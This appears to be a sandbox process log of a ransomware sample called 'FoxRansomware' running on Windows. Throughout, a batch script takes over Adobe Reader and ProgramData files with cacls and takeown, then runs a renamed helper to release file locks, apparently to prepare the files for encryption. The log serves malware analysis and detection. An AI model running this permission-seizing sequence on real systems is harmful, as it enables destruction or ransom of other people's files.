C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:2576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:2804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:3572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:2508
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:3560
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:1228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "create_form.gif" -nobanner3⤵PID:3532
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "create_form.gif" -nobanner4⤵PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:4084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "info.gif" -nobanner3⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "info.gif" -nobanner4⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:3748
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:3708
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:2636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:2316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:3780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "trash.gif" -nobanner3⤵PID:1952
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "trash.gif" -nobanner4⤵PID:3772
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:4032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:3764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵
- Modifies file permissions
PID:2836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:3844
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:3540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:3832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:3908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:2672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:4072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:2880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:3860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:3856
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:3084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "can.hyp" -nobanner3⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "can.hyp" -nobanner4⤵PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:2948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1860
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:3088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "usa37.hyp" -nobanner3⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "usa37.hyp" -nobanner4⤵PID:2420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:2520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:3180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:3152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:3696
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:3124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:3680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1780
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:3080
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:3128
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "behavior.xml" -nobanner3⤵PID:1064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "behavior.xml" -nobanner4⤵PID:2688
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:3308
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:3092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:2872
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:1868
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:2744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵PID:3292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:3352
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:3436
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:2808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "eula.ini" -nobanner3⤵PID:2860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "eula.ini" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:3216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:3444
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:3460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:3060
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:3472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:2024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:2408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:3412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:2544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:2404
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:2724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:2556
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:1448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:3324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵
- Modifies file permissions
PID:528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:3536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:1332
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:2764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:1300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:3632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:3620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:3520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:2596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:2656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:2980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:3912
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:2436
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:3224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:2284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "brt04.hsp" -nobanner3⤵PID:2524
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "brt04.hsp" -nobanner4⤵PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2512
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:3752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:4016
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:2308
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "engphon.env" -nobanner3⤵PID:3936
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "engphon.env" -nobanner4⤵PID:4076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:1956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:2820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
PID:4048
-
-
